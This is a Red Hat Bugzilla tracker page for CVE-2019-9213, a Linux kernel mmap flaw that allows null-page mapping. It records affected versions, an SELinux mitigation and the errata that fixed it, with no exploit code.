Bug 1686136 (CVE-2019-9213) - CVE-2019-9213 kernel: lack of check for mmap minimum address in expand_downwards in mm/mmap.c leads to NULL pointer dereferences exploit on non-SMAP platforms
Summary: CVE-2019-9213 kernel: lack of check for mmap minimum address in expand_downwa...
Status: CLOSED ERRATA
Alias: CVE-2019-9213
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: All
OS: Linux
high
high
Target Milestone: ---
Assignee: Red Hat Product Security
QA Contact:
URL:
Whiteboard: impact=important,public=20190227,repo...
Keywords: Security
Depends On: 1687667 1687668 1708832 1686137 1687669 1692205 1708829 1708830 1708831 1715342
Blocks: 1686219 1686141
TreeView+ depends on / blocked
 
Reported: 2019-03-06 19:50 UTC by msiddiqu
Modified: 2019-06-17 19:56 UTC (History)
29 users (show)

(edit)
A flaw was found in mmap in the Linux kernel allowing the process to map a null page. This allows attackers to abuse this mechanism to turn null pointer dereferences into workable exploits.
Clone Of:
(edit)
Last Closed: 2019-06-10 10:50:04 UTC


Attachments (Terms of Use)


External Trackers
Tracker ID Priority Status Summary Last Updated
Red Hat Product Errata RHSA-2019:0831 None None None 2019-04-23 14:30 UTC
Red Hat Product Errata RHSA-2019:1479 None None None 2019-06-17 18:00 UTC
Red Hat Product Errata RHSA-2019:1480 None None None 2019-06-17 19:56 UTC

Description msiddiqu 2019-03-06 19:50:54 UTC
In the Linux kernel before 4.20.14, expand_downwards in mm/mmap.c lacks a check for the mmap minimum address, which makes it easier for attackers to exploit kernel NULL pointer dereferences on non-SMAP platforms. This is related to a capability check for the wrong task.

An upstream patch:

https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=0a1d52994d440e21def1c2174932410b4f2a98a1

References:

https://bugs.chromium.org/p/project-zero/issues/detail?id=1792

https://seclists.org/oss-sec/2019/q1/166

Comment 1 msiddiqu 2019-03-06 19:51:11 UTC
Created kernel tracking bugs for this issue:

Affects: fedora-all [bug 1686137]

Comment 6 Wade Mealing 2019-03-12 03:49:15 UTC
Bit of a public update since people have been asking:

The reproducer (and the theory) fails on both Red Hat Enterprise Linux 6 and 7.  The commit which introduced this flaw is 32e4e6d5cbb0c0e427391635991fe65e17797af8 and it needs to be be present to be exploited correctly. 

At this time this commit does not exit in Red Hat Enterprise Linux 6 and 7.  

This commit however IS present in the kernel-alt (ARM kernel) for rhel-7 based on 4.10.  However for the exploit to work correctly selinux must be disabled.  Other security mitigation technology will assist in mitigating this flaw from being useful (such as PXN (SMEP like) and PAN (SMAP like)), but are not considered an "absolute" defense, attackers may be able to work around these protection mechanisms.

Comment 8 Wade Mealing 2019-03-12 06:04:50 UTC
Mitigation:

Enabling selinux prevents the public exploit from working correctly.

Comment 14 errata-xmlrpc 2019-04-23 14:30:32 UTC
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 7

Via RHSA-2019:0831 https://access.redhat.com/errata/RHSA-2019:0831

Comment 16 errata-xmlrpc 2019-06-17 18:00:01 UTC
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 8

Via RHSA-2019:1479 https://access.redhat.com/errata/RHSA-2019:1479

Comment 17 errata-xmlrpc 2019-06-17 19:56:03 UTC
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 8

Via RHSA-2019:1480 https://access.redhat.com/errata/RHSA-2019:1480


Note You need to log in before you can comment on or make changes to this bug.